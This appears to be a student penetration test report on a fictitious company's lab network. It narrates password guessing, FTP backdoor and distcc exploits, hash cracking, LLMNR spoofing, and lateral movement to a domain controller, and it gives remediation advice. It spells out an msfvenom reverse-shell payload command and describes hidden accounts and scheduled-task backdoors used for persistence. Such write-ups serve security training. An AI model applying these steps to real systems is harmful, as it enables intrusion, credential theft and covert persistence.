MegaCorpOne Penetration Test Report
A penetration test of a fictitious company under the assumed name of a well-known security company (Mr. Robot ;)) as a project for my certificate program. (10/03/2022)
Introduction
In accordance with MegaCorpOne’s policies, Allsafe, LLC (henceforth known as AS) conducts external and internal penetration tests of its networks and systems throughout the year. The purpose of this engagement was to assess the networks’ and systems’ security and identify potential security flaws by utilizing industry-accepted testing methodology and best practices. The project was conducted on a number of systems on MegaCorpOne’s network segments by AS during October of 2022.
For the testing, AS focused on the following:
Attempting to determine what system-level vulnerabilities could be discovered and exploited with no prior knowledge of the environment or notification to administrators.
Attempting to exploit vulnerabilities found and access confidential information that may be stored on systems.
Documenting and reporting on all findings.
All tests took into consideration the actual business processes implemented by the systems and their potential threats; therefore, the results of this assessment reflect a realistic picture of the actual exposure levels to online hackers. This document contains the results of that assessment.
Assessment Objective
The primary goal of this assessment was to provide an analysis of security flaws present in MegaCorpOne’s web applications, networks, and systems. This assessment was conducted to identify exploitable vulnerabilities and provide actionable recommendations on how to remediate the vulnerabilities to provide a greater level of security for the environment.
AS used its proven vulnerability testing methodology to assess all relevant web applications, networks, and systems in scope.
MegaCorpOne has outlined the following objectives:
Objective
Find and exfiltrate any sensitive information within the domain.
Escalate privileges to domain administrator.
Compromise at least two machines.
Penetration Testing Methodology
Reconnaissance
AS begins assessments by checking for any passive (open source) data that may assist the assessors with their tasks. If internal, the assessment team will perform active recon using tools such as Nmap and Bloodhound.
Identification of Vulnerabilities and Services
AS uses custom, private, and public tools such as Metasploit, hashcat, and Nmap to gain perspective of the network security from a hacker’s point of view. These methods provide MegaCorpOne with an understanding of the risks that threaten its information, and also the strengths and weaknesses of the current controls protecting those systems. The results were achieved by mapping the network architecture, identifying hosts and services, enumerating network and system-level vulnerabilities, attempting to discover unexpected hosts within the environment, and eliminating false positives that might have arisen from scanning.
Vulnerability Exploitation
AS’s normal process is to both manually test each identified vulnerability and use automated tools to exploit these issues. Exploitation of a vulnerability is defined as any action we perform that gives us unauthorized access to the system or the sensitive data.
Reporting
Once exploitation is completed and the assessors have completed their objectives, or have done everything possible within the allotted time, the assessment team writes the report, which is the final deliverable to the customer.
Scope
Prior to any assessment activities, MegaCorpOne and the assessment team will identify targeted systems with a defined range or list of network IP addresses. The assessment team will work directly with the MegaCorpOne POC to determine which network ranges are in-scope for the scheduled assessment.
It is MegaCorpOne’s responsibility to ensure that IP addresses identified as in-scope are actually controlled by MegaCorpOne and are hosted in MegaCorpOne-owned facilities (i.e., are not hosted by an external organization). In-scope and excluded IP addresses and ranges are listed below.
IP Address/URL
Description
172.16.117.0/16
MCO.local
*.Megacorpone.com
MegaCorpOne internal domain, range and public website
Executive Summary of Findings
Grading Methodology
Each finding was classified according to its severity, reflecting the risk each such vulnerability may pose to the business processes implemented by the application, based on the following criteria:
Critical: Immediate threat to key business processes.
High: Indirect threat to key business processes/threat to secondary business processes.
Medium: Indirect or partial threat to business processes.
Low: No direct threat exists; vulnerability may be leveraged with other vulnerabilities.
Informational: No threat; however, it is data that may be used in a future attack.
As the following grid shows, each threat is assessed in terms of both its potential impact on the business and the likelihood of exploitation:
Summary of Strengths
While the assessment team was successful in finding several vulnerabilities, the team also recognized several strengths within MegaCorpOne’s environment. These positives highlight the effective countermeasures and defenses that successfully prevented, detected, or denied an attack technique or tactic from occurring.
Windows Account Lockout On
Only necessary ports on the Web Server are open (22, 80, 443)
Firewall rules only allowed outbound traffic on Port 53
Summary of Weaknesses
AS successfully found several critical vulnerabilities that should be immediately addressed in order to prevent an adversary from compromising the network. These findings are not specific to a software version but are more general and systemic vulnerabilities.
Weak VPN password credentials
Confidential php file accessible through Dorking webpage
One service on 172.22.117.150 was listening on Port 21 (Backdoor creation)
Admin Password and Credentials file on web server was not hidden and had an obvious name
User password complexity was very minimal and took little to no time to crack with John
Usernames and passwords were the same between separate machines which made lateral movement easier
Simple user actions generated an LLMNR request that was spoofed for another credential and hash
System information was attainable with WMIexec command execution
Host-based firewall did not pick up on script added to the C:\ drive to ensure a reverse tcp shell connection (persistence)
Persistence through Service was possible due to internal migration tactics (hidden service accounts that were not audited or triggered any IDS)
Tasklist was able to be edited to add a persistent backdoor script
LSASS cache was able to be accessed remotely to reveal more credentials
Admin credentials utilized to move laterally to the Domain Controller (DC)
DC was able to be exploited to reveal more user credentials and their hashes
Executive Summary
Beginning the penetration test of MegaCorpOne’s network, following the specified scope and Rules of Engagement, I began with some OSINT techniques through Google Dorking. A search entry, “site:megacorpone.com,” produced a few valuable web pages including an Index of Assets that contained the web server the site was running (Apache version 2.4.38 on Debian OS). Further queries produced a list of employee names and email addresses that shed light on company email naming structure. After a few more refined searches, I was also able to locate a hidden file called “nanites.php” that contained sensitive company information (robots.txt was supposed to keep this from standard search engine discovery).
Following the Google Dorking section, I utilized the tool nslookup to discover the IP address of MegaCorpOne.com, and placed it as a search in the Shodan database. This led to a discovery of which Ports were open and ready for traffic (Ports 22, 80, 443). The version of SSH was found to be SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2, and the web server information discovered above held true. A potential vulnerability (CVE-2019-0215, CVE-2019-0220, CVE-2019-0217, CVE-2019-0197, CVE-2019-0196, CVE-2019-0211) was also listed, but not confirmed quite yet, and the web server itself was found to be located in Montreal, Canada.
Utilizing Recon-ng to gather some more information, I was able to create a report finding a list of Hosts and IP addresses to utilize later in the test. There were a total of 18 hosts, and the IP’s are listed in the screenshot of my report below:
After careful review of the Recon-ng report, I realized there was a host titled “vpn.megacorpone.com.” This site prompts a login to gain access to MegaCorpOne’s VPN, and the technique I used was password guessing. Utilizing Usernames crafted from variants of employee email naming components (first initial last name), I began guessing common passwords in order to gain access to the VPN. The password combinations I discovered are as follows:
After a successful login utilizing thudson and thudson, I was able to download the script “vpn.sh” and execute it in my command line. This technique got me access to the internal VPN of MegaCorpOne.
Once access to the VPN was gained, I ran the command “ip addr” in order to discover what IP and subnet mask I was connected to, and the results for ethernet interface 1 are as follows:
A Zenmap scan (nmap -T4 -A -v --script ftp-vsftpd-backdoor,smb-os-discovery,smb-system-info 172.22.117.0/24) provided the following information about open ports and a listed vulnerability involving a backdoor via Port 21:
Out of this grand list of open ports, there are a few exploits that are able to be run. Utilizing searchsploit, I tracked down a specific exploit involving utilization of a backdoor via the open Port 21. The targeted host will be the IP address: 172.22.117.150.
Upon execution of the 5th option above with the command “python /usr/share/exploitdb/exploits/remote/49757.py,” a shell connection was established and the following UID and GID were discovered:
This information allowed me to successfully gain access to the host 172.22.117.150. Another Version scan utilizing Nmap (to draw less attention from IDS/IPS) provided further information that would eventually be used in the Metasploit Framework.
After this scan, a simple attempt at searching for an exploit throughout the MSFConsole led me to an exploit called distcc_exec. Combining this with a reverse shell payload, I was successfully able to gain access to the remote host 172.22.117.150.
After setting the Local Host to my IP address, I ran the exploit and was able to establish a low level reverse shell connection to the specified Remote Host.
Once inside of the remote host, I ran a series of find and grep commands in order to navigate and find sensitive information. THis information would include keywords such as secret, passwords, admin, key, etc. I was able to find an important file path named “/var/tmp/adminpassword.txt.” These were the results of viewing that file’s contents:
The provided credentials offer two main venues of further exploitation: an SSH connection can be established because Port 22 is open, and the account is admin, which means higher privileged access and more files open to viewing and manipulation. Command to achieve this connection was a success with the discovered credentials. This account was also discovered to have root access by executing the command “sudo su.”
Following privilege escalation, I utilized the John the Ripper tool to crack any hashes I found in the “/etc/shadow” file. This list of hashes was cracked against the wordlist “rockyou.txt” to speed up the cracking process. The following list shows the cracked hashes and credentials found across all valid user accounts for this Web server:
I then established persistence on the web machine in order to have access at a later time if I require it or lose the connection, or even if a password change occurs for valid credentials. To do this, I first began by editing the “/etc/ssh/sshd_config” file by adding my own specified Port 10022. After changes were made, I rebooted the server and reconnected via SSH with the admin account found earlier. I required a hidden account as well, so I created “systemd-ssh” with my own password for access and no home directory specified. I then added my new account to the Sudo group so I would have escalated privileges upon future logins.
After establishing persistence on the Web server, I now had access whenever I wanted to reconnect via my own port and hidden account. The company accounts were not finished yet, however. In the coming paragraphs and screenshots, I will be covering the ethical hacking process for the Windows Host.
First I began the process by utilizing Nmap again to scan the network IP subnet range (172.22.117.0/24) to ensure I scanned every device over again. I performed this with a version scan as follows:
In order to tell these are windows machines simply by the scan, I looked for common use Ports and services among windows systems like Samba (445), RDP (3389), and Kerberos (88). Kerberos especially shows if a host is a Domain controller or not, and if any of the logins I found earlier work, I can launch another exploit and gain access via one of these openings.
I returned to Metasploit and decided Samba would be the point of entry and exploitation. I went with the methodology of Password Spraying (as Windows systems have lockout from login group policies), and utilized the following attack and options with user tstark’s credentials:
This exploit resulted in success on two specific IP addresses, 172.22.117.10 and 172.22.117.20:
As it turns out, the credentials gained via the Debian based web server from earlier held true with the Windows machine.
After this, I launched an LLMNR Spoofing exploit to trick the system into giving up a potential login username and hash. The responder tool allowed me to retrieve the following hash and information:
Upon cracking the given hash with John again, the new set of credentials was found to be “pparker” and “Spring2021.”
Next I moved back to Metasploit to take advantage of some remote wmiexec commands. I used whoami, net session, net share, tasklist, and system info to discover more about the IP address 172.22.117.20. The results are below:
For the next exploit, I created a payload using the tool msfvenom. The command entered would establish a meterpreter connection for access to the system via a shell. It read: msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.22.117.100 LPORT 4444 -f exe > shell.exe. The creation of this payload as a shell executable came in handy later when establishing persistence on the Windows Host. Using smbclient and tstark’s credentials, I was able to gain access to the remote machine.
Once connected, I was in the Windows “root” directory, so I added the shell.exe payload to the system to utilize later. Going back to the wmiexec exploit from earlier, I utilized this to execute my newly added shell.exe payload after setting up my own meterpreter shell listener (the two combined formed a reverse shell connection between my local host and the remote host).
After connecting via meterpreter reverse shell, I needed to establish persistence. To do this, I utilized persistence_service to create a randomly generated service on the WIndows machine that I could connect to later. To better hide the service I reallocated it to a better named service that is under ownership of the “System” user, and then using meterpreter, I had a few more tasks to complete.
I established persistence by taking my shell script from earlier and adding it to the Windows list of scheduled tasks. This would allow my script to be executed at 00:00 every day under the radar so I always have a backdoor for a reverse shell connection.
Following the creation of persistence, I went forward with obtaining more secure credentials by accessing the LSA Dump Cache and cracking the available hashes with John again. I was able to obtain the following credentials:
I utilized bbanner’s login and another Metasploit tool to test other hosts and see if the credentials would be valid for the Domain Controller (DC). Once verified, it was time to move laterally from the compromised Windows 10 system to the Windows DC. I utilized another Metasploit tool from an open Meterpreter session and established a SYSTEM level login with the DC.
Lastly, I made sure to obtain even more credentials once inside the DC. I used a tool called DCSync to obtain more user hashes and used John to crack those as well. Their cracked passwords per username are listed below:
Summary Vulnerability Overview
Vulnerability
Severity
Weak password on public web application
Critical
Confidential file visible to public via Google Dorking
Medium
Port 21 Open on Web Server service
Critical
Admin Credentials were too easy to find in filesystem
Critical
Admin Credentials to Domain Controller too Weak
Critical
The following summary tables represent an overview of the assessment findings for this penetration test:
Scan Type
Total
Hosts
172.22.117.0/24
Ports
All open (21, 22, 80, 443, 53)
Exploitation Risk
Total
Critical
4
High
0
Medium
1
Low
0
Vulnerability Findings
Weak Password on Public Web Application
Risk Rating: Critical
Description:
The site vpn.megacorpone.com is used to host the Cisco AnyConnect configuration file for MegaCorpOne. This site is secured with basic authentication but is susceptible to a dictionary attack. AS was able to use a username gathered from OSINT in combination with a wordlist in order to guess the user’s password and access the configuration file.
Affected Hosts: vpn.megacorpone.com
Remediation:
Set up two-factor authentication instead of basic authentication to prevent dictionary attacks from being successful.
Require a strong password complexity that requires passwords to be over 12 characters long, upper+lower case, & include a special character.
Reset the user thudson’s password.
Confidential File Visible to Public via Google Dorking
Risk Rating: Medium
Description:
After utilizing Google Dorking methods, AS was able to discover a blacklisted site on the “robots.txt” file. This file was then sought out and revealed internal company information regarding the measured nanite levels..
Affected Hosts: megacorpone.com
Remediation:
Store this information in a more protected (or deeper layered) database that will no post on the front end web.
Utilize a diversified web server design which houses sensitive company data on another server to increase redundancy and security of data.
Encrypt the sensitive information so that it is not written in plaintext to eliminate human readable exposure of sensitive data.
Port 21 Open on Web Server
Risk Rating: Critical
Description:
The web server (IPv4: 172.22.117.150) has a service on it that leaves Port 21 (FTP) open. AS discovered this in multiple network scans and exploited in an attempt to gain access. FTP is no longer secure and used to transfer payloads to a target machine so AS was able to exploit this and gain access to the web server.
Affected Hosts: megacorpone.com (172.22.117.150)
Remediation:
Carefully vet services and check required service configurations before installing them on a web server.
Maintain frequent network scans in order to audit the current configured settings and monitor logs in order to keep Ports shut that don’t need to be open.
Configure further firewall rules to block traffic via Port 21 and ensure security of the web server, even if services’ Port configurations cannot be changed.
Admin Credentials Easily Located in Obvious File
Risk Rating: Critical
Description:
Once AS gained access to the web server, Linux search commands were utilized to comb the filesystem for certain keywords such as secret, password, or admin. This led to the discovery of an unprotected file revealed to house the msfadmin login and password in plaintext. This was then utilized to gain authenticated SSH access to the web server and further exploit the machine.
Affected Hosts: megacorpone.com (172.22.117.150)
Remediation:
Maintain proper security of admin credentials and do NOT store them on the actual web server.
Obfuscate file names so they are not so easily discovered with a “find” command initiated from the root directory.
Encrypt the file itself so that the credentials are not written in plaintext.
Change credentials frequently so there are more chances of eliminating prolonged access to a server.
Admin Credentials to Domain Controller too Weak
Risk Rating: Critical
Description:
After access was obtained on both the Linux Web Server and the discovered Windows 10 machine, AS utilized discovered credentials to laterally move to the Windows Domain Controller (DC). All discovered passwords for user accounts, especially admin accounts, were very simplistic and able to be brute forced with a variety of tools including John the Ripper. This lateral movement was easily executed due to this vast amount of weak passwords.
Affected Hosts: megacorpone.com (172.22.117.10, 172.22.117.20)
Remediation:
Establish two-factor authentication to ensure logins are protected with one extra level of security.
Password strength needs to be increased, both by character count, special characters, and a combination of upper and lowercase letters.
Renew passwords every 3 months to keep prolonged access to a minimum.
MITRE ATT&CK Navigator Map
The following completed MITRE ATT&CK navigator map shows all of the techniques and tactics that AS used throughout the assessment.
Last updated
